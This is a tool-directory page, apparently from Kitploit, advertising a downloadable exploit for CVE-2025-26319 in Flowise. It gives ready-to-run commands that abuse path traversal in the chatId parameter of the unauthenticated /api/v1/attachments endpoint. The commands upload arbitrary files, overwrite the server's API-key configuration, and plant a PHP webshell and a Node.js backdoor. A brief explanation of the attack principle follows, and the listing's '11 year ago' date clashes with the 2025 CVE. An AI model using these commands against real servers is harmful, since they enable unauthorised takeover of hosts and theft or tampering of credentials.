Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/redpack-kr/cve-2025-26319
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubredpack-kr/cve-2025-26319

CVE-2025-26319

Exploit for CVE-2025-26319 targeting Flowise's /api/v1/attachments endpoint, enabling unauthenticated arbitrary file upload and webshell generation via path traversal.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-26319

  1. Basic File Upload python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
  2. Upload Configuration File

Modify API key configuration

python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Auto-generate and Upload Webshell

Upload PHP Webshell

python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

Upload Node.js Backdoor

python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

Attack Principle Using the /api/v1/attachments route which is in the whitelist, no authentication required Path traversal by manipulating the chatId parameter (../../../) Upload arbitrary files to any location on the server file system

Download Tool